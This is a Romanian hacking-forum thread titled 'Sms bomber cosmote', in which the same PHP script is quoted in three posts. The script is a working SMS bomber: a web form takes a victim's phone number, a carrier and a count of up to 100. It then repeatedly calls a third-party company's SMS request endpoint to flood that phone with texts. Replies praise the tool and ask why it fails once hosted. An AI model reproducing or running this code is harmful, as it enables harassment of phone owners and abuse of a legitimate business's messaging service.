Jump to content
luke999

Sms bomber cosmote

Recommended Posts

Uite unul ce l-am facut eu in php:

<?php
/*
\\\\\\\----SMS Bomber----///////
Author: SilviuSDS
*/

$country = 175;
$cosmote = 327;
$orange = 329;
$vodafone = 328;

$header = "<link rel=\"stylesheet\" href=\"style.css\"/><body style=\"padding: -100px;\">
<div class=\"title\">SMS Bomber</div>";

$form = sprintf("<center><form action=\"index.php\" method=\"post\">
<span class=\"text\">Choose career:</span>
<select class=\"search-input\" name=\"operator\" style=\"width: 200px;\">
<option value=\"%u\">Cosmote</option>
<option value=\"%u\">Orange</option>
<option value=\"%u\">Vodafone</option>
</select></br></br>
<span class=\"text\">Phone Number: </span><input type=\"text\" class=\"search-input\" name=\"phone\" style=\"width: 200px;\"/></br></br>
<div style=\"padding-right:70px;\"><span class=\"text\"> SMS Number (max 100): </span><input type=\"text\" class=\"search-input\" name=\"smscount\" style=\"width: 200px;\"/></div></br></br>
<input class=\"button\" type=\"submit\" value=\"Send SMS\"/></form></center>
",$cosmote,$orange,$vodafone);

$succes = "<center></br></br>
<div><a href=\"index.php\">Go Back</a></div></center>";


function sendSMS($phoneNr, $operator) {
$c = curl_init();
$url = sprintf("http://www.gameloft.com/request-sms.php?wc=documents&step=1&phone=%u&country=175&operator=%u",$phoneNr,$operator);
curl_setopt ($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_HEADER, 0);
curl_exec($c);
}



if(!isset($_POST['phone']) || !isset($_POST['operator']) || !isset($_POST['smscount'])) {
print($header.$form);
}
else {
$smscount = $_POST['smscount'];
if($smscount > 100) {
$smscount = 100;
}
else if($smscount < 5) {
$smscount = 5;
}
print($header);
for($count = 1; $count <= $smscount; $count++) {
sendSMS($_POST['phone'], $_POST['operator']);
printf("<div class=\"text\">SMS no:%u sent</div></br>",$count);
}
print($succes);
}

?>

Am si unul facut pe jumatate in c++ dar mi-e lene sa-l termin.

Link to comment
Share on other sites

Uite unul ce l-am facut eu in php:

<?php
/*
\\\\\\\----SMS Bomber----///////
Author: SilviuSDS
*/

$country = 175;
$cosmote = 327;
$orange = 329;
$vodafone = 328;

$header = "<link rel=\"stylesheet\" href=\"style.css\"/><body style=\"padding: -100px;\">
<div class=\"title\">SMS Bomber</div>";

$form = sprintf("<center><form action=\"index.php\" method=\"post\">
<span class=\"text\">Choose career:</span>
<select class=\"search-input\" name=\"operator\" style=\"width: 200px;\">
<option value=\"%u\">Cosmote</option>
<option value=\"%u\">Orange</option>
<option value=\"%u\">Vodafone</option>
</select></br></br>
<span class=\"text\">Phone Number: </span><input type=\"text\" class=\"search-input\" name=\"phone\" style=\"width: 200px;\"/></br></br>
<div style=\"padding-right:70px;\"><span class=\"text\"> SMS Number (max 100): </span><input type=\"text\" class=\"search-input\" name=\"smscount\" style=\"width: 200px;\"/></div></br></br>
<input class=\"button\" type=\"submit\" value=\"Send SMS\"/></form></center>
",$cosmote,$orange,$vodafone);

$succes = "<center></br></br>
<div><a href=\"index.php\">Go Back</a></div></center>";


function sendSMS($phoneNr, $operator) {
$c = curl_init();
$url = sprintf("http://www.gameloft.com/request-sms.php?wc=documents&step=1&phone=%u&country=175&operator=%u",$phoneNr,$operator);
curl_setopt ($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_HEADER, 0);
curl_exec($c);
}



if(!isset($_POST['phone']) || !isset($_POST['operator']) || !isset($_POST['smscount'])) {
print($header.$form);
}
else {
$smscount = $_POST['smscount'];
if($smscount > 100) {
$smscount = 100;
}
else if($smscount < 5) {
$smscount = 5;
}
print($header);
for($count = 1; $count <= $smscount; $count++) {
sendSMS($_POST['phone'], $_POST['operator']);
printf("<div class=\"text\">SMS no:%u sent</div></br>",$count);
}
print($succes);
}

?>

Am si unul facut pe jumatate in c++ dar mi-e lene sa-l termin.

+1 , frumos

Link to comment
Share on other sites

Uite unul ce l-am facut eu in php:

<?php
/*
\\\\\\\----SMS Bomber----///////
Author: SilviuSDS
*/

$country = 175;
$cosmote = 327;
$orange = 329;
$vodafone = 328;

$header = "<link rel=\"stylesheet\" href=\"style.css\"/><body style=\"padding: -100px;\">
<div class=\"title\">SMS Bomber</div>";

$form = sprintf("<center><form action=\"index.php\" method=\"post\">
<span class=\"text\">Choose career:</span>
<select class=\"search-input\" name=\"operator\" style=\"width: 200px;\">
<option value=\"%u\">Cosmote</option>
<option value=\"%u\">Orange</option>
<option value=\"%u\">Vodafone</option>
</select></br></br>
<span class=\"text\">Phone Number: </span><input type=\"text\" class=\"search-input\" name=\"phone\" style=\"width: 200px;\"/></br></br>
<div style=\"padding-right:70px;\"><span class=\"text\"> SMS Number (max 100): </span><input type=\"text\" class=\"search-input\" name=\"smscount\" style=\"width: 200px;\"/></div></br></br>
<input class=\"button\" type=\"submit\" value=\"Send SMS\"/></form></center>
",$cosmote,$orange,$vodafone);

$succes = "<center></br></br>
<div><a href=\"index.php\">Go Back</a></div></center>";


function sendSMS($phoneNr, $operator) {
$c = curl_init();
$url = sprintf("http://www.gameloft.com/request-sms.php?wc=documents&step=1&phone=%u&country=175&operator=%u",$phoneNr,$operator);
curl_setopt ($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_HEADER, 0);
curl_exec($c);
}



if(!isset($_POST['phone']) || !isset($_POST['operator']) || !isset($_POST['smscount'])) {
print($header.$form);
}
else {
$smscount = $_POST['smscount'];
if($smscount > 100) {
$smscount = 100;
}
else if($smscount < 5) {
$smscount = 5;
}
print($header);
for($count = 1; $count <= $smscount; $count++) {
sendSMS($_POST['phone'], $_POST['operator']);
printf("<div class=\"text\">SMS no:%u sent</div></br>",$count);
}
print($succes);
}

?>

Am si unul facut pe jumatate in c++ dar mi-e lene sa-l termin.

A mai incercat cineva acest sms bomber? L-am urcat pe un site dar nu merge. Da eroare.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...